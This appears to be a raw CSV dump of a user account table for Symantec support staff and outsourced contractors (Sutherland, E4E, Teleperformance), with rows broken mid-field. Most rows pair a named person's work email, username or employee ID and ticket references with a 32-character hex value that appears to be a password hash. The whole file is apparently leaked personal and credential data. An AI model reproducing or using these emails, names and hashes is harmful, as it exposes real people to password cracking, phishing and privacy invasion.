e0bd-481c-92ff-27de7fcfe05d,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607049 - PR - 27th March 2012,dd1d4b71e25d93c1417a8612fa4c6894,Ailani,<blank>,22
3125,Kajal ,NULL,NULL,NULL
b37-433f-bfdd-9d04724080fa,<blank>,<blank>,leroy.feron@nl.twenty4help.com,Telepe
rformance Holland,49ee3058682042b8fd29dfda680564f3,Feron,<blank>,Leroy_Feron,Ler
oy,NULL,NULL,NULL
b30-458c-85b5-f753d15ddade,<blank>,<blank>,manuel.post@nl.twenty4help.com,Telepe
rformance Holland,131f7ab2356f8d991c8a324ff44297c4,Post,<blank>,Manuel_Post,Manu
el,NULL,NULL,NULL
a63-4a9a-a5e1-3ebf45c433d4,<blank>,<blank>,marco.vanalphen@nl.twenty4help.com,Te
leperformance Holland,ad6bcf031fea3feb88e467b1bf082d8b,van Alphen,<blank>,Marco_
van Alphen,Marco,NULL,NULL,NULL
b555-4153-b0ef-e4fd777f3630,CRQ000000275395--vmd--10/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,62eb41b77f113627f7bca44f14279f29,Sarma Ragupathy,<bla
nk>,117050,Ashok Kumar,NULL,NULL,NULL
fd22-4e48-a06f-ca0180bd1673,REQ000001370172--vmd-27/04/2012,000-000,shreyas_sawa
nt@suth.com,sutherland,c4cfde1809802b7c0b853997940a33a4,Sawant,<blank>,224258,Sh
reyas,NULL,NULL,NULL
68c-4372-a6ad-b3fea3051409,<blank>,<blank>,thom_jackson@symantec.com,Symantec,e7
e9b85f33b43dc367e7522d7dfe997c,Jackson,<blank>,thom_jackson,Thom,NULL,NULL,NULL
4ab-4b40-b367-236df2873e80,<blank>,076644,tools_id@symantec.suth.com,Symantec,f1
26891c36a9e5731bc16a064bd861f0,Shalini,<blank>,s_shalini,S.,NULL,NULL,NULL
4b2f-4478-a776-b4e8343cb381,CRQ000000734339--vmd--17/07/2012,<blank>,tools_id@sy
mantec.suth.com,sutherland,a819eeab0dc85a52b726dc3c582421df,Dhrangdrawala,<blank
>,227954,Ebrahim,NULL,NULL,NULL
8b5-4c59-80c2-3213c92d2691,<blank>,<blank>,nandakumar.k@symantects.chnts.e4e.com
,E4E,3489e662ddf5dab5fd386423e6913746,Kumar,<blank>,Nanda_Kumar,Nanda,NULL,NULL,
NULL
be5-4506-9ffa-0dd60a19b7bc,<blank>,<blank>,vibha.magazine@symantec.ts.e4e.com,E4
E,3f26e5022e61a13c3524d026ef72efc9,magazine,<blank>,vibha_magazine,vibha,NULL,NU
LL,NULL
9e7-4dc1-b758-caaf2fdf5c4f,<blank>,<blank>,saravanan.srinavasan@symantec.ts.e4e.
com,E4E,bebfc97951a61b1ca7d1a2a6b90a6ea4,s,<blank>,saravanan_s_e4e,saravanan,NUL
L,NULL,NULL
ec5-4183-9a80-183f7831f5b1,<blank>,<blank>,rajmohan.prasad@symantec.ts.e4e.com,E
4E,b32813ec69671dfa49de9c3415fed3a4,prasad,<blank>,rajmohan_prasad,rajmohan,NULL
,NULL,NULL
ccf-4aae-af6a-429050375012,<blank>,<blank>,pramod.john@symantec.ts.e4e.com,E4E,f
5677dab9f69477b55af35a2b74f6e7e,john,<blank>,pramod_john,pramod,NULL,NULL,NULL
132-4126-a080-07856aa4b38e,<blank>,090597/2633282,Tools_id@symantec.suth.com,Sut
herland,545c0f9a67a3d444759eadf096118a29,Sonawane,<blank>,rishikesh_sonawane,Ris
hikesh,NULL,NULL,NULL
ce3-4e30-a761-f02e0a473432,<blank>,<blank>,mohd.tariq@symantec.ts.e4e.com,E4E,4b
41543db90898bbecafadc111a776dd,tareq,<blank>,mohd_tareq,mohd,NULL,NULL,NULL
ed7-41a1-b26b-bce0cea11ec2,<blank>,<blank>,khalid.mamdapur@support.e4e.com,E4E,5
0867ae11100ddd181a09026efc9ced6,Mamdapur,<blank>,Khalid_Mamdapur,Khalid,NULL,NUL
L,NULL
2b3-439d-a8b5-c77da29d4371,<blank>,89703/2635069,Tools_id@symantec.suth.com,"Sut
herland Global Services, Inc.",384fd9cb40e2904e3cbfd56c220b1b81,Mathew,<blank>,s
hijo_mathew,Shijo,NULL,NULL,NULL
4f7-4673-8b28-d743d421b842,<blank>,<blank>,devraj.s@symantec.ts.e4e.com,E4E,c091
d175fa51472201246bcc2cb13863,Sriramulu Dharani,<blank>,Devraj_Sriramulu_Dharani,
Devraj,NULL,NULL,NULL
1d0-4e9f-b3ff-bb73d0131b98,<blank>,<blank>,somasekhar.gore@symantec.ts.e4e.com,e
4e,e83e147a54229b9df00e2fd99af1bc91,Gore,<blank>,Somasekhar_Gore,Somasekhar,NULL
,NULL,NULL
62c-46ae-9927-de24dac71ada,<blank>,<blank>,lynn_adams@symantec.com,Symantec,7dd0
15ed8e0a713f29bbf661f430ca2a,Adams,<blank>,lynn_adams,Lynn,NULL,NULL,NULL
18c-43ce-884b-d1ab4444547f,<blank>,<blank>,levi_smith@symantec.com,Symantec,c7e4
f027ae2efc4994f9e0de65c0c5be,Smith,<blank>,levi_smith,Levi,NULL,NULL,NULL
7aa-4915-981c-2c2637f9173a,<blank>,<blank>,maegan_tremarche@symantec.com,Symante
c,c1b2ed1fe822749c4b998f27f838a0a9,Tremarche,<blank>,maegan_tremarche,Maegan,NUL
L,NULL,NULL
9cf-456a-b706-0da7dbafdfd2,<blank>,<blank>,joshua_walker@symantec.com,Symantec,9
164aa51ef57607a86811f7d13c85833,Walker,<blank>,josh_walker,Josh,NULL,NULL,NULL
6bd-4d0b-a52d-e155bcb933f7,<blank>,<blank>,roger_akerson@symantec.com,Symantec,7
676a6b337c6d351e91c3346b9addbfe,Akerson,<blank>,roger_akerson,Roger,NULL,NULL,NU
LL
cbb-4463-9218-f4a5a45ce2e9,<blank>,<blank>,kimberly_rodrigues@symantec.com,Syman
tec,dd717a4b65fbd6b9533c6fb12b993d9a,Rodrigues,<blank>,kimberly_rodrigues,Kimber
ly,NULL,NULL,NULL
9e83-46d6-9df5-ec548eea2048,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,12a758b05d2a6b364ba55e262434fec1,John,<blank>,075666,Ale
x C,NULL,NULL,NULL
7c7-4ee8-84b2-104a3dc5532f,<blank>,<blank>,deepa.murugesan@symantec.ts.e4e.com,E
4E,c3cbaa2f1e7a0476bc7dd82619286dd0,Murugesan,<blank>,Deepa_Murugesan,Deepa,NULL
,NULL,NULL
1cc-4d6b-b2f4-ac49d7f08e33,<blank>,<blank>,desai.raghunandana@symantec.ts.e4e.co
m,E4E,01ecf9242d82f64a4bea1c318cb0150c,Raghunandana,<blank>,Desai_Raghunandana,D
esai,NULL,NULL,NULL
ea43-4f8a-a297-d317edf0a3af,CRQ000000460123 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,2dbc63cf928eb6897951b48801efcbe4,Mendoza,<blank>,12321
6,Maria Carmela Castelltort,NULL,NULL,NULL
e8e-437d-ba46-96a3441fdffe,<blank>,86546,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",7f6e42514ec76d5532b697f8342b8ed5,Narayanan,<blank>,venkat
esh_narayanan,Venkatesh,NULL,NULL,NULL
2d1a-44d4-9328-f519c5f3f543,CRQ000000601683--vmd--22/03/2012,<blank>,riza_mendoz
a@Suth.com,Sutherland,c3b729b2d6949e24503b0d4190430224,Mendoza,<blank>,222630,Ri
za,NULL,NULL,NULL
579-41ed-82fa-8d025413549e,<blank>,<blank>,m.nafil@symanteccs.chnts.e4e.com,E4E,
12819ae08f835ee34b1640a0777bd40b,Nafil,<blank>,Mohamed_Nafil,Mohamed,NULL,NULL,N
ULL
73b-49f5-a93f-fd3df7596001,<blank>,<blank>,manikandan.k@symantects.chnts.e4e.com
,E4E,d335d9e5f3813fcbc1d5b1edef510d92,Kandan,<blank>,Mani_Kandan,Mani,NULL,NULL,
NULL
964-4707-8705-b155da82feaf,<blank>,<blank>,alivia.karmakar@symantec.ts.e4e.com,E
4E,cba19ce271fbf67dbeb9c786030f8e99,S,<blank>,Sabita_S,Sabita,NULL,NULL,NULL
d60b-4f39-b461-8b2f302a8213,CRQ000000601687--vmd--22/03/2012,<blank>,celinagrace
_nativida@Suth.com,Sutherland,f58bf11c3d025017798ae6d0c9dbef5d,Natividad,<blank>
,222632,Celina Grace,NULL,NULL,NULL
f4a-44c8-8793-2aff1027a2dc,<blank>,<blank>,praveen.joy@symantects.chnts.e4e.com,
E4E,be159ac6441e404086ad68ca92c1b3d7,fernando,<blank>,Praveenjoy_fernando,Pravee
njoy,NULL,NULL,NULL
37a9-4810-9587-aa1f5bc8939c,<blank>,<blank>,douglas_lemon@symantec.com,Symantec,
b6982c9d521055ec12985b38fd3813a8,Lemon,<blank>,douglas_lemon,Douglas,NULL,NULL,N
ULL
0e7-4e37-acd7-d9f5e41b4d63,<blank>,<blank>,ather.basha@symantects.chnts.e4e.com,
E4E,09db1b9e0e3ea2be943b50cd77acda9e,Basha,<blank>,Ather_Basha,Ather,NULL,NULL,N
ULL
6653-48f2-ad8e-ca2cb20be33e,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,02e12b8ab090b7c618cf27153efe32d0,Asaithambi,<blank>,074633,Gopinath,NULL,
NULL,NULL
e543-44f5-8aa6-c5702fb636cd,<blank>,INC000000169242,berangere_galvin@symantec.co
m,Symantec,6ab45a600fb3be10b4ecac10731d270f,Galvin,<blank>,021003,Berangere,NULL
,NULL,NULL
a549-4cf2-a98e-1e3b7a3c651d,CRQ000000100669,AY 30-07-2010,tools_id@symantec.com,
<blank>,a3f6da52bd816151b426b43a26ad1fed,Prasad,<blank>,106864,Karuna,NULL,NULL,
NULL
52c-45eb-9830-6edeec715c27,<blank>,<blank>,santhosh.pazhachira@symantec.ts.e4e.c
om,E4E,3e34daf169eb945798e668d4068a3c91,pazhachira,<blank>,santhosh_pazhachira,s
anthosh,NULL,NULL,NULL
e79-4fb1-9b34-8d9f177ca0b0,<blank>,<blank>,jagadish.ganesan@support.e4e.com,E4E,
364b2209a9a85b6c9b433a28e8e7f19b,Ganesan,<blank>,Jagadish_Ganesan,Jagadish,NULL,
NULL,NULL
0b5e-448d-a601-f838c71a75ec,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,15bfcea8734ad7385163a993c61b3843,Selvynamalan,<blank>,086004,Joseph,NULL,NULL,N
ULL
15d-4b68-949c-d433bd3b40cf,<blank>,<blank>,venkatesha.k@symantec.ts.e4e.com,E4E,
febcfc0a9d7d62e1d981b248ce823099,Krishnappa,<blank>,Venkatesha_Krishnappa,Venkat
esha,NULL,NULL,NULL
779-4b58-91df-3595db17d388,<blank>,090922,Tools_id@symantec.suth.com,<blank>,076
a25905e6786f9750b9329e59c5735,B,<blank>,suresh_b,Suresh,NULL,NULL,NULL
6a9-4ab3-bcf6-342ea4ea7137,<blank>,<blank>,jiji.aravind@symantec.ts.e4e.com,E4E,
54deb5969859e871a7c47c270fcafed9,Aravind,<blank>,Jiji_Aravind,Jiji,NULL,NULL,NUL
L
58b-4ed0-aa5a-5ec5297397d7,<blank>,<blank>,angiras.raman@symantec.ts.e4e.com,E4E
,ea0ee111b41573c8c809354900369f2c,Raman,<blank>,Angiras_Raman,Angiras,NULL,NULL,
NULL
f88b-4c80-b066-a176c8e40257,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607014 - PR - 27th March 2012,9ccd2ef463817a2c06521494dedcdde0,Vaidya,<blank>,22
3116,Sonali,NULL,NULL,NULL
597-4c40-bffd-71eede7fcd41,<blank>,<blank>,sathish.kumarm@chnts.e4e.com,E4E,55ca
b45418c5fd855c29a2e162de337e,kumar,<blank>,sathish_kumar,sathish,NULL,NULL,NULL
9ea-4850-913c-10a934ea3d2d,<blank>,<blank>,Jaingladish.lg@india.iseva.com,E4E,54
37e9ba43a9ee08081da05ac326d8b6,lg,<blank>,Jaingladish_lg,Jaingladish,NULL,NULL,N
ULL
f53-48dc-a856-2c1d84949a43,<blank>,<blank>,Rajesh.Prasad@symantec.ts.e4e.com,E4E
,cbd0e72c29423644e57e00f42de1f170,Prasad,<blank>,Rajesh_Prasad,Rajesh,NULL,NULL,
NULL
4e27-45d9-8698-da36c7f7923b,11/05/2010 - SPJ,EMPROV,Tools_ID@symantec.Suth.com,S
utherland,9b9c904b471dba92ef647a1c4a46b0d0,Saxena,<blank>,105077,Chitra,NULL,NUL
L,NULL
023-4fb5-9829-e6280afcd885,<blank>,<blank>,rakshak.patil@symantec.ts.e4e.com,E4E
,898349848d01d2c9a0ef491407b28c53,Patil,<blank>,Rakshak_Patil,Rakshak,NULL,NULL,
NULL
850-4079-98d1-05653fdaae47,<blank>,<blank>,suraj.sekar@symantec.ts.e4e.com,E4E,2
771fcf697faa8e94e2cdca766da644c,Sekar,<blank>,Suraj_Sekar,Suraj,NULL,NULL,NULL
a3ee-4cd3-84a2-281e01e676e0,"CRQ000000669890 CLNP May 23,2012",000-000-0000,tool
s_id@symantec.suth.com,Sutherland,80125ca4c2d719bf83071c5257efbf5d,Thakkar,<blan
k>,225903,Brijesh,NULL,NULL,NULL
a23-4d18-9573-b6ea02c4fae6,<blank>,<blank>,venkat.sudhidra@support.e4e.com,E4E,c
c14d7848ac8c539ff675d229fe4fe00,Sudhindra,<blank>,Venket_Sudhindra,Venket,NULL,N
ULL,NULL
12c2-47e0-aaa7-36e4dc311d93,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
544783 - PR - 8th Feb 2012,ff7fe6f0adccf340a93294476eb45ca3,Sasidharan,<blank>,1
14713,Ravisankar S P,NULL,NULL,NULL
126c-4d40-b128-a5cbe8d181f9,<blank>,<blank>,jkos@symantec.teleperformance.gr,CT
- 12/09/2012 - CRQ000000800587,a4b452f6b04f8f9bd0b76347955bd50e,Kos,<blank>,2299
64,Jan,NULL,NULL,NULL
94a8-4702-9b54-4b5bf0e6f6db,SRB 27.08.2010,INC000000251655,tools_id@symantec.sut
h.com,Sutherland,d00d9f7aaf2b018c26fc3c0b22b0c0d1,Basha,<blank>,094902,Buggegari
jilani,NULL,NULL,NULL
f207-4240-891a-8c47a89bf0f3,17/02/2010 - SPJ,INC114065,tools_id@symantec.suth.co
m,Sutherland,887655a3f2198f678d3d7c288b6f1657,N,<blank>,089316,Dhanasekaran,NULL
,NULL,NULL
ca83-4323-903c-065e10f75fbb,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464896,8f2bf80033070a7ee5812105f93a51fe,Henson,<blank>,123249,Ma.
Valerie Ann Saavedra,NULL,NULL,NULL
99c-4e6b-831e-9c77f876bc07,<blank>,<blank>,linda_le@symantec.com,Symantec,2842ab
844960273f9583c188cf0f9924,Le,<blank>,linda_le,Linda,NULL,NULL,NULL
3c54-4fe9-ad82-21f1c4e25c50,CRQ000000479738 CLNP 30 Dec 2011,000-0000,Anja_Sharm
a@symantec.com,Symantec,cbe299b56e641e2887847101b33906e5,Sharma,<blank>,119175,A
nja,NULL,NULL,NULL
0e0-469f-ae65-f2bf0cad2677,<blank>,<blank>,AbdulJabbar_PU@SUTH.COM,Sutherland,a7
4fe7b52d3014dfdd341badeceb18d3,P U,<blank>,AbdulJabbar_PU,Abdul Jabbar,NULL,NULL
,NULL
a25b-4798-84fa-82ba158c51d8,CRQ000000486382 CLNP 04 Jan 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,81236d6cb1c12a19ccb5991cefc0e94b,Ignacio,<blank>,123
645,JeanyLee,NULL,NULL,NULL
1a82-432f-aeab-27ed109c7148,<blank>,<blank>,aminelli@symantec.teleperformance.gr
,RM-16feb-2012-CRQ000000559135,84619599c72c3d7199755e0228a0667e,Minneli,<blank>,
124837,Antonio,NULL,NULL,NULL
0c71-4fa8-a57e-1e19ff7172b7,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607045 - PR - 27th March 2012,4f46df53afd6dd04fd245f916f4a3d32,Rambhiya,<blank>,
223124,Pritesh ,NULL,NULL,NULL
47b-421d-a909-7318414ff175,<blank>,<blank>,Abhner_Pauly@SUTH.COM,Sutherland,21d2
9b13989e162ead394df3aca3c2ee,Pauly,<blank>,Abhner_Pauly,Abhner,NULL,NULL,NULL
973-471e-928b-0d119aa2a1a5,<blank>,<blank>,geoffrey_evans@symantec.com,Helpdesk,
db2646eedadba631727672a2f5dc0810,Evans,<blank>,geoffrey_evans,Geoffrey,NULL,NULL
,NULL
5be-494a-994c-1be7be4476ed,<blank>,<blank>,AbrahamPrabhu_E@SUTH.COM,Sutherland,2
6a6b323f44757ad941cede5d3901933,E,<blank>,AbrahamPrabhu_E,Abraham Prabhu,NULL,NU
LL,NULL
5f60-456c-92f6-8826d21abe90,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692557 - PR - 12th June 2012,c6235421c02f16e9428d4f1cb9a6dbf8,Espiritu,<blank
>,226643,Hazel Marie ,NULL,NULL,NULL
824f-4df9-a388-bc363fc145b4,WS 22-07-2010,INC000000223553,tools_id@symantec.suth
.com,<blank>,7d872fb030103befdb78a1b341c032c3,A,<blank>,075686,Abdul,NULL,NULL,N
ULL
b303-4927-946e-83b577535d5a,CRQ000000563609--VMD--21/02/2012,000-000,Vasuki_G@Su
th.com,sutherland,6e35a0e4ecf093f7db12f9383f297013,G,<blank>,113280,Vasuki,NULL,
NULL,NULL
537a-4f2c-b3fe-d0f186f3623c,CRQ000000601691--vmd--22/03/2012,<blank>,micoandreo_
sambrano@Suth.com,Sutherland,12543bb490140f391918ba0226a721a3,Sambrano,<blank>,2
22633,Mico Andreo,NULL,NULL,NULL
06f-452b-8686-312424945dc1,<blank>,<blank>,AdrianBeneth_Jayectin@SUTH.COM,Suther
land,42a01e95ab4d817ae1a403c7bc11dac9,BenethJayectin,<blank>,AdrianBeneth_Jayect
in,Adrian,NULL,NULL,NULL
cc6-4d77-b043-060e4626652e,<blank>,<blank>,Ajesh_Mathew@SUTH.COM,Sutherland,579f
c318d544c49d3a4909308475f263,Mathew,<blank>,Ajesh_Mathew,Ajesh,NULL,NULL,NULL
a26-47a5-89c9-102ddb215297,<blank>,<blank>,scott_manton@symantec.com,Helpdesk,4d
55673bb5480e5ea927e5eca9577414,Manton,<blank>,scott_manton,Scott,NULL,NULL,NULL
01b3-4710-864c-e42749a73255,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,a4f7995b3cc364bfabc941f9b54d6543,Jeevagan,<blank>,075641
,Vijai Anand,NULL,NULL,NULL
560f-474c-bcd3-4ae459a7ba83,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,e8cb46eab87ad0138caf001ab633e5d2,Vizard,<blank>,083123,Sean,NULL,NULL,NULL
7d4-4964-9f7b-09081005f15f,<blank>,<blank>,hemantha.raj@symantects.chnts.e4e.com
,E4E,772133ef6e86f471b0f1ede6177b5bb4,Raj,<blank>,Hemantha_Raj,Hemantha,NULL,NUL
L,NULL
d3ea-4c85-bff1-6e56d322c655,"CRQ000000264491-rj-mAY26,2011",000-0000,aloysiusbas
il_lawrence@SUTH.COM,Sutherland,59c0a1fb31617b77204d98a0b919d0a7,Lawrence,<blank
>,115490,Aloysius Basil,NULL,NULL,NULL
1ff0-4acf-8591-de5a1c96843b,CRQ000000460034 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,dc4f4214378a6c08ce900613c07d03c7,Abucejo,<blank>,12319
0,Ken Michael Tancontian,NULL,NULL,NULL
e12-46b7-b9e2-6b952b0b09a6,<blank>,<blank>,nanda.kishore@symantec.ts.e4e.com,E4E
,c073957e7769fae6e3d50ea87acb3fd8,kishore,<blank>,nanda_kishore,nanda,NULL,NULL,
NULL
80c-4b65-be2c-af46aaab4adb,<blank>,<blank>,mohammed.t@symantec.ts.e4e.com,E4E,eb
6974f1889086a4aa36ec1842863fea,tayyab,<blank>,mohammed_tayyab,mohammed,NULL,NULL
,NULL
ccc-4813-99c6-e2b4157ad42c,<blank>,<blank>,krishna.l@symantec.ts.e4e.com,E4E,824
4578c92e58aa51003e15f22d6584d,l,<blank>,krishna_l,krishna,NULL,NULL,NULL
1124-4548-9232-0d4f5b731895,CRQ000000245736 PBP 26/04/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,22abe0629a3b23dfcabe35c98e87b022,Khan,<blank>,115166,Aj
mal,NULL,NULL,NULL
de75-441a-ab10-82679df5b585,CRQ000000460042 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,3ed1e1efd949036941a007c6d2fcd2d7,Buslanganon,<blank>,1
23191,Bader Mabayambang,NULL,NULL,NULL
597-4893-abb7-339f8bb6db24,<blank>,86287,tools_id@symantec.suth.com,Symantec,654
dd426a49b2e5cc262e5b4ec2d1a71,Shak,<blank>,prakashroka_shak,Prakashroka,NULL,NUL
L,NULL
6ff-4cf5-87df-44ff08f8f900,<blank>,<blank>,milan.kothari@symantec.ts.e4e.com,E4E
,5e9fec6dbfabb57437dd6429d4129228,Kothari,<blank>,Milan_Kothari,Milan,NULL,NULL,
NULL
dfc-4d03-a0db-0932597290af,<blank>,<blank>,jackson.zalki@e4e.com,E4E,0c6bd5451e7
c38a97ecc345dda8900b7,Zalki,<blank>,jackson_zalk,Jackson,NULL,NULL,NULL
46c-4db7-b909-aaf6b8e71729,<blank>,<blank>,shashi.dharan@symantec.ts.e4e.com,E4E
,445cfb1c3e879f0efbdc6c3278d5541a,B,<blank>,Shashidharan_B,Shashidharan,NULL,NUL
L,NULL
ec8-4640-a6b2-0a129079cde3,<blank>,<blank>,surya.ganesh@e4e.com,E4E,5cf513db763a
ee120412cc12bf6aa76d,C.P,<blank>,suryaganesh_C_P,suryaganesh,NULL,NULL,NULL
79f0-46f1-9770-b9a84e7bcf94,<blank>,<blank>,Arsel_Villawala@SPI.COM,PM - 6/14/20
12 - CRQ000000694507,8a3d138520378c20c4ad32a79211130d,Villawala,<blank>,226719,A
rsel,NULL,NULL,NULL
66f-4aaf-a667-21f94f2456f9,<blank>,<blank>,Aina_Pador@SUTH.COM,Sutherland,90b91c
d14753ae900b776f181ead69cb,Pador,<blank>,Aina_Pador,Aina,NULL,NULL,NULL
2909-4515-b716-a381784890bc,RJ-23-12-2010,<blank>,seema_spilli@symantec.com,Syma
ntec,273b7a6eaac98649000248a2992242e6,S Pilli,<blank>,111560,Seema,NULL,NULL,NUL
L
888-45e8-9fbf-3557f1a55da7,<blank>,<blank>,Ajith_B2@SUTH.COM,Sutherland,07a39fa3
97148f82831ebe6a286384dc,B,<blank>,Ajith_B2,Ajith,NULL,NULL,NULL
eb5-4cdc-b634-6338fb8bf224,<blank>,<blank>,Alexandre_Dassylva@SUTH.COM,Sutherlan
d,c0b01e87c95c5d1a04a00ebe30a78665,Dassylva,<blank>,Alexandre_Dassylva,Alexandre
,NULL,NULL,NULL
378-4a6e-8f09-05d2c4b183a5,<blank>,<blank>,wesley_welty@symantec.com,Swapdrive,d
b4dd1c5f7a0d4cd81d07e14a4be6dc0,Welty,<blank>,wesley_welty,Wesley,NULL,NULL,NULL
caac-46eb-a348-429da3af6eab,CRQ000000709695--vmd--26/06/2012,<blank>,fevie_facun
1@suth.com,sutherland,d8af73b27e4fe217fee672e50d5ed766,Facun,<blank>,226469,Fevi
e,NULL,NULL,NULL
23c9-4b84-9177-e31683a4a127,CRQ000000709695--vmd--26/06/2012,<blank>,jeremy_duqu
e@suth.com,sutherland,ff7cb8e7783db722f05f63caa64f2fe1,Duque,<blank>,226483,Jere
my,NULL,NULL,NULL
af2-4b45-8be3-674a5ea798d4,<blank>,<blank>,Amrita_Singh@SUTH.COM,Sutherland,6542
1729f5beb1b2f5c1eda2454c7225,Singh,<blank>,Amrita_Singh,Amrita,NULL,NULL,NULL
db7-44fa-9a28-94cef14f9f56,<blank>,2630245,Amy_Lebouef@cingular.suth.com,Sutherl
and,6aacd1a4ef74cb68d9ada89942307b81,Lebouef,<blank>,Amy_Lebouef,Amy,NULL,NULL,N
ULL
78c8-4950-b692-791496be5372,<blank>,<blank>,lozolina@symantec.teleperformance.gr
,CT - 12/09/2012 - CRQ000000801280,bf09aa5ea7176e28e069a04b09a3ff2f,Ozolina,<bla
nk>,229993,Liga,NULL,NULL,NULL
45c3-41de-8b1c-10cd685fc375,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,d
57174b42e44c59ee955045f15353236,Kern Fontillas,<blank>,110836,Kervin,NULL,NULL,N
ULL
cd5e-4356-9cd7-1543d92639e6,CRQ000000353692 SP OCT 10 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,fcdd2bc42b38c0d4e276110ef971d1e9,Pailwan,<blank>,11709
6,Shali,NULL,NULL,NULL
550-453e-9abe-04191f82453d,<blank>,<blank>,vicent.raj@symantects.chnts.e4e.com,E
4E,e9ae44e555a041cbdbc420192c7b9774,Raj,<blank>,Vincent_Raj,Vincent,NULL,NULL,NU
LL
9689-44d3-8398-8118e8c7108f,CRQ000000349498 SP OCT 4 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,0f0a6daad5e8309e60e8543c939c8fa7,DoblasToledo,<blank>,1
03071,Cecile,NULL,NULL,NULL
214e-43c9-a3d5-951d6ae8e7cc,CRQ000000709695--vmd--26/06/2012,<blank>,joallysa_hi
bayalumas@suth.com,sutherland,af4951b50b6f9cbba5d6fb7e47081e7e,HibayaLumasag,<bl
ank>,101635,JoAllysa,NULL,NULL,NULL
90f-466d-8763-2cb206ddc75d,<blank>,<blank>,krishna.kishore@symantec.ts.e4e.com,E
4E,b1ef3a10eb758509c31d1027ef0f06bc,Kishore,<blank>,Krishna_Kishore,Krishna,NULL
,NULL,NULL
299a-4478-b3b4-781978955528,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,84d1b3a266144c7fb934186ccb92e3a9,CH,<blank>,075310,Maheedhar,NULL,NULL,NU
LL
d93a-477d-ae99-70dc1eebcaa6,<blank>,<blank>,becky_cannon@symantec.com,Symantec,e
fea198cbd02ad41891a39a2b9b22fe2,Cannon,<blank>,becky_cannon,Becky,NULL,NULL,NULL
e912-412e-8a9e-f5a03f33bb7b,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,0
d9d9f340d7f3b782ca453d89c5489a3,Anumalla,<blank>,111884,Sandeep Rao,NULL,NULL,NU
LL
c30-4b40-abb9-13d0b5fe6a1e,<blank>,090606/2633282,Tools_id@symantec.suth.com,Sut
herland,c630a67a2f8832bbca84eab400627437,Tiwari,<blank>,shobha_tiwari,Shobha,NUL
L,NULL,NULL
dc60-46b8-b6d3-a5d21c572e9d,CRQ000000486576--vmd--04/01/2012,000-0000,tools_id@s
ymantec.suth.com,Sutherland,d9685a77fa90b63657a84bb69e87130e,Aringo,<blank>,1236
31,Zindy,NULL,NULL,NULL
6aed-43ca-8db4-5ab03246a1f9,CRQ000000709695--vmd--26/06/2012,<blank>,jenniferros
e_druja@suth.com,sutherland,f5c8d8d1a1c83a33295ab843a3ddd7d3,Druja,<blank>,22645
0,Jennifer Rose,NULL,NULL,NULL
c31-48d1-a37b-966a75f9a8ec,<blank>,<blank>,s.varun@symanteccs.chnts.e4e.com,E4E,
c299196bba4a5cb198921e0854ae2ed0,S,<blank>,Varun_S,Varun,NULL,NULL,NULL
5e1d-494a-88f0-c0444565e363,sms 01.10,INC213497,tools_id@symantec.suth.com,<blan
k>,7fa87a04c0e5c67e8500c78b0f14f803,R,<blank>,075402,Prabhakaran,NULL,NULL,NULL
88d8-4ad1-b46f-59196f692758,sms 01.10,INC213497,tools_id@symantec.suth.com,<blan
k>,beafcbc7716accec21c0050598776b73,K,<blank>,075410,Prabhakaran,NULL,NULL,NULL
cff1-4237-8322-786a3605cb24,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716140,4341c5e355e68e33ef24324060494654,Navos,<blank>,227440,Doisa ,NULL,NULL,N
ULL
e51-4687-8853-0bb464d519d1,<blank>,<blank>,kumar.sunil@symantec.ts.e4e.com,E4E,b
2e2f7e0bb21bed58f3236098b3daa5a,kumar,<blank>,sunil_kumar,sunil,NULL,NULL,NULL
1ef5-45d5-8b94-e2f8f88fdc79,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,bf89bf001c658b47f01d497d905c1383,Parthasarathy,<blank>,086202,Ramya,NULL,NULL,N
ULL
6c7c-446a-a883-587db46dab82,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,0
3e8625bf4cffaf037c0718321cb167d,Mesina,<blank>,227442,Jessica Charlene ,NULL,NUL
L,NULL
add2-49d9-a42e-43060d86e6fe,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716147,d7f60c747df6d113b0985a18d52816b7,Mangandam,<blank>,227443,Oscar ,NULL,NU
LL,NULL
7810-4e4e-aac8-901d58271529,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,49df6d11e2c8bb5cbe8c2fd07a8c5305,P,<blank>,anoop_p_cc,Anoop ,NULL,NULL,NU
LL
01f-4357-be05-e1174ac631bc,<blank>,<blank>,Raghavendra.Gupta@ts.e4e.com,E4E,1d03
df366a72ffda97cfe2a722230590,Gupta,<blank>,Raghavendra_Gupta,Raghavendra,NULL,NU
LL,NULL
1682-4ad4-a5da-856a95dcdb96,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716150,e741f34629ba161fae1b3d12ccb3dc48,Gemelo,<blank>,227444,Lea ,NULL,NULL,NUL
L
edc-42d9-b4b8-2faec4f5e84c,<blank>,073869,AbdulFarooq_AR@SUTH.COM,Sutherland,f78
abcecc4a340b62ec430a69eb2563f,Abdur Rahman,<blank>,AbdulFarooq_AR,Mohamed Abdul
Farooq,NULL,NULL,NULL
